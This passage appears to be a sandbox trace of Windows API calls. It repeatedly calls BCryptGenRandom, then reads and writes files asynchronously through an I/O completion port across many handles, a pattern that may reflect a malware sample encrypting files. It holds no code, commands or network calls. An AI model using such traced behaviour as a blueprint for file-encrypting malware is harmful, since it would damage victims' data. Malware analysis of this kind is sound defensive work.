(hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.634] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0196.634] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.634] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.634] free (_Block=0x3e305b8) [0196.634] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.634] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.635] free (_Block=0x1fa91d0) [0196.635] free (_Block=0x1fa2ed8) [0196.635] free (_Block=0x1fa90b8) [0196.635] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.635] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.642] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.643] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0196.643] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.644] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0196.644] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.644] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.644] free (_Block=0x3e305b8) [0196.644] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.644] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.645] free (_Block=0x1fa91d0) [0196.645] free (_Block=0x1fa2ed8) [0196.645] free (_Block=0x1fa90b8) [0196.645] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0196.645] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.650] CloseHandle (hObject=0x170) returned 1 [0196.650] free (_Block=0x3df0008) [0196.651] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.663] CloseHandle (hObject=0x338) returned 1 [0196.663] free (_Block=0x1ff1e60) [0196.663] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.666] ReadFile (in: hFile=0x2a4, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x275c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0196.670] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.671] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xfca, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.671] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.717] CloseHandle (hObject=0x170) returned 1 [0196.728] free (_Block=0x3df0008) [0196.729] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.739] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7b2, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.739] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.742] CloseHandle (hObject=0x2a4) returned 1 [0196.742] free (_Block=0x1ff1e60) [0196.742] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.743] CloseHandle (hObject=0x308) returned 1 [0196.743] free (_Block=0x3d70450) [0196.743] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.949] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.950] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0196.950] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.951] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0196.951] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.951] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.951] free (_Block=0x3e305b8) [0196.951] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.951] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.952] free (_Block=0x1fa91d0) [0196.952] free (_Block=0x1fa2ed8) [0196.952] free (_Block=0x1fa90b8) [0196.952] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.952] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.953] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x2430, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0196.953] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.152] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0197.152] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.161] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.161] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.161] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.161] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.162] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.162] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.162] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.162] free (_Block=0x3e305b8) [0197.162] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.162] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.163] free (_Block=0x1fa91d0) [0197.163] free (_Block=0x1fa2ed8) [0197.163] free (_Block=0x1fa90b8) [0197.163] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0197.163] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.169] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x30e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.170] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.182] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.183] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.183] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.183] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.184] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.184] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.184] free (_Block=0x3e305b8) [0197.184] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.184] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.184] free (_Block=0x1fa91d0) [0197.184] free (_Block=0x1fa2ed8) [0197.184] free (_Block=0x1fa90b8) [0197.184] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0197.185] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.198] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.199] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.199] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.200] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.200] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.200] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.200] free (_Block=0x3e305b8) [0197.200] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.200] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.201] free (_Block=0x1fa91d0) [0197.201] free (_Block=0x1fa2ed8) [0197.201] free (_Block=0x1fa90b8) [0197.201] WriteFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0197.201] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.213] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.214] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.214] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.215] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.215] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.215] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.215] free (_Block=0x3e305b8) [0197.215] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.215] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.216] free (_Block=0x1fa91d0) [0197.216] free (_Block=0x1fa2ed8) [0197.216] free (_Block=0x1fa90b8) [0197.216] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.216] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.217] CloseHandle (hObject=0x338) returned 1 [0197.217] free (_Block=0x3d70450) [0197.217] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.218] CloseHandle (hObject=0x2a4) returned 1 [0197.219] free (_Block=0x3e70008) [0197.219] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.219] CloseHandle (hObject=0x3cc) returned 1 [0197.219] free (_Block=0x3df0008) [0197.219] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.220] CloseHandle (hObject=0x330) returned 1 [0197.220] free (_Block=0x1ff1e60) [0197.220] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.251] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0xa87e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0197.253] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.254] CloseHandle (hObject=0x170) returned 1 [0197.255] free (_Block=0x3ef0008) [0197.255] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.272] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.273] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.273] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.274] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.274] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.274] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.274] free (_Block=0x3e305b8) [0197.274] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.274] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.275] free (_Block=0x1fa91d0) [0197.275] free (_Block=0x1fa2ed8) [0197.275] free (_Block=0x1fa90b8) [0197.275] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.275] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.277] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x27f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.288] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xd4f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.288] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.288] CloseHandle (hObject=0x170) returned 1 [0197.288] free (_Block=0x3df0008) [0197.289] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.297] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.297] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.297] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.298] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.298] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.298] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.298] free (_Block=0x3e305b8) [0197.298] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.298] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.299] free (_Block=0x1fa91d0) [0197.299] free (_Block=0x1fa2ed8) [0197.299] free (_Block=0x1fa90b8) [0197.299] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.299] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.301] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1820, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.301] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.313] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xa24, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.313] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.313] CloseHandle (hObject=0x170) returned 1 [0197.313] free (_Block=0x3df0008) [0197.313] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0197.346] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.347] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.347] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.347] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.347] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.347] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.348] free (_Block=0x3e305b8) [0197.348] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.348] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.348] free (_Block=0x1fa91d0) 